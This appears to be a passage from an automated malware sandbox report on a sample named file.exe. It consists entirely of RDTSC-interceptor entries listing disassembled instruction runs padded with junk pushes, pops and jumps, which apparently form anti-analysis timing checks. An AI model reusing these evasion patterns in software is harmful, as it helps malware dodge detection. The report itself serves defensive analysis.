Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55C7B5 second address: 55C7D4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8B146C0A06h 0x00000008 ja 00007F8B146C0A06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 jnl 00007F8B146C0A06h 0x00000017 pop edi 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55C7D4 second address: 55C7DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55C7DA second address: 55C7E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8B146C0A06h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502F3F second address: 502F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5669E5 second address: 5669EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56585F second address: 565879 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E3Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F8B151F0E3Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 565E21 second address: 565E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 je 00007F8B146C0A13h 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F8B146C0A0Bh 0x00000016 jp 00007F8B146C0A0Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5663CC second address: 5663D2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5663D2 second address: 5663D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5663D8 second address: 5663DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56AC79 second address: 56AC97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8B146C0A14h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 569D9C second address: 569DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 569DA0 second address: 569DAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146C0A0Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 569DAF second address: 569DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A0A2 second address: 56A0FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jo 00007F8B146C0A06h 0x0000000c jmp 00007F8B146C0A10h 0x00000011 jg 00007F8B146C0A06h 0x00000017 jmp 00007F8B146C0A19h 0x0000001c popad 0x0000001d popad 0x0000001e pushad 0x0000001f push eax 0x00000020 jmp 00007F8B146C0A18h 0x00000025 pop eax 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A0FD second address: 56A105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A105 second address: 56A10D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A3D6 second address: 56A3DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A3DC second address: 56A3E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A7DA second address: 56A7DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A7DE second address: 56A7F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146C0A16h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A7F8 second address: 56A802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A802 second address: 56A806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A806 second address: 56A80A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A80A second address: 56A81B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a jo 00007F8B146C0A06h 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A81B second address: 56A82F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8B151F0E3Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jl 00007F8B151F0E42h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F86D second address: 56F890 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8B146C0A0Dh 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007F8B146C0A06h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F890 second address: 56F89A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F89A second address: 56F8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56F8A0 second address: 56F8C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F8B151F0E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8B151F0E47h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5776AB second address: 5776AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5776AF second address: 5776F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8B151F0E44h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnp 00007F8B151F0E36h 0x00000012 push esi 0x00000013 pop esi 0x00000014 jmp 00007F8B151F0E49h 0x00000019 jnp 00007F8B151F0E36h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5776F6 second address: 577722 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8B146C0A06h 0x00000008 jmp 00007F8B146C0A0Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007F8B146C0A0Ch 0x0000001c jnp 00007F8B146C0A06h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57788C second address: 577898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F8B151F0E36h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 577898 second address: 57789E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57789E second address: 5778AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F8B151F0E36h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 577B61 second address: 577B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8B146C0A06h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 577B6C second address: 577B76 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8B151F0E3Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 577B76 second address: 577B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jnc 00007F8B146C0A06h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 577E4E second address: 577E5E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8B151F0E42h 0x00000008 jns 00007F8B151F0E36h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 577E5E second address: 577E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5782AE second address: 5782C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E45h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5783F6 second address: 5783FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5783FA second address: 578400 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 578400 second address: 57841E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8B146C0A17h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 578C67 second address: 578C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ABAB5 second address: 4ABADB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146C0A17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F8B146C0A06h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ABADB second address: 4ABADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ABADF second address: 4ABB09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146C0A0Fh 0x00000007 je 00007F8B146C0A06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8B146C0A0Dh 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ABB09 second address: 4ABB0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ABB0D second address: 4ABB1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ABB1B second address: 4ABB21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57EF06 second address: 57EF1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007F8B146C0A11h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57EF1E second address: 57EF25 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590B0F second address: 590B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590B15 second address: 590B19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590B19 second address: 590B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F8B146C0A11h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590B37 second address: 590B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590B3D second address: 590B4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146C0A0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5904EC second address: 5904F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59066D second address: 590671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 592884 second address: 592889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5929D6 second address: 5929DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5929DA second address: 5929F0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8B151F0E36h 0x00000008 jne 00007F8B151F0E36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 599102 second address: 59910D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F8B146C0A06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B91E second address: 59B922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B922 second address: 59B92C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8B146C0A06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B92C second address: 59B932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B932 second address: 59B936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B936 second address: 59B93A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B93A second address: 59B955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B146C0A12h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AC622 second address: 5AC63E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F8B151F0E41h 0x0000000c popad 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AC63E second address: 5AC651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c jbe 00007F8B146C0A06h 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB035 second address: 5AB047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 ja 00007F8B151F0E36h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB470 second address: 5AB479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB716 second address: 5AB722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F8B151F0E36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB722 second address: 5AB726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB726 second address: 5AB73F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8B151F0E36h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8B151F0E3Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB8B4 second address: 5AB8BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AB8BC second address: 5AB8C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B0361 second address: 5B0367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AFEC8 second address: 5AFEFA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F8B151F0E45h 0x00000008 jmp 00007F8B151F0E41h 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B901C second address: 5B9028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8B146C0A06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9028 second address: 5B902D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B902D second address: 5B9078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146C0A15h 0x00000007 jnc 00007F8B146C0A08h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F8B146C0A12h 0x00000017 jl 00007F8B146C0A06h 0x0000001d jnp 00007F8B146C0A06h 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F8B146C0A14h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9078 second address: 5B9082 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8B151F0E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9082 second address: 5B9088 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9088 second address: 5B908C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B908C second address: 5B9092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B9092 second address: 5B909C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B909C second address: 5B90A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C07E9 second address: 5C07F5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8B151F0E3Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C2FBF second address: 5C2FC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5C2FC8 second address: 5C2FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B151F0E46h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8B151F0E43h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CF586 second address: 5CF58A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CF0FC second address: 5CF100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5CF100 second address: 5CF108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E052F second address: 5E0548 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8B151F0E4Bh 0x00000008 jmp 00007F8B151F0E3Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DFC97 second address: 5DFC9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DFDF7 second address: 5DFDFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5DFDFD second address: 5DFE02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
